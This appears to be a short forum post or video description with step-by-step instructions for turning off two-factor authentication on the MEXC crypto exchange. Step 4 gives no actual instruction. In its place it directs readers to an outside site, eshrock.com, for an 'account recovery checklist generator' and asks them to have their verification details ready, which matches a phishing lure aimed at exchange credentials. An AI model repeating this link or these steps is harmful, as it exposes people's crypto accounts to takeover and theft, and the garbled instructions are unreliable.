I ran into this last week. Here's what fixed it for me. If you're looking to disable two-factor authentication on MEXC, follow these simple steps. Step 1. Log into your account. Start by logging into your MEXC account using your username and password. Make sure you have access to your account for the next steps. Step 2. Go to Security Settings. Once logged in, navigate to your account settings. Look for the Security section in the menu. Step 3. Locate two-factor authentication. In the Security settings, find the option for two-factor authentication 2FA. This is where you can manage your 2FA settings. Step 4. Disable two-factor authentication. Before starting recovery, use the eshrock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Confirm changes. After entering the verification code, confirm your changes. You should see a notification that 2FA has been successfully disabled. And that's it. Disabling two-factor authentication on MEXC is straightforward if you follow these steps. If you have any questions or run into issues, feel free to reach out. Happy trading!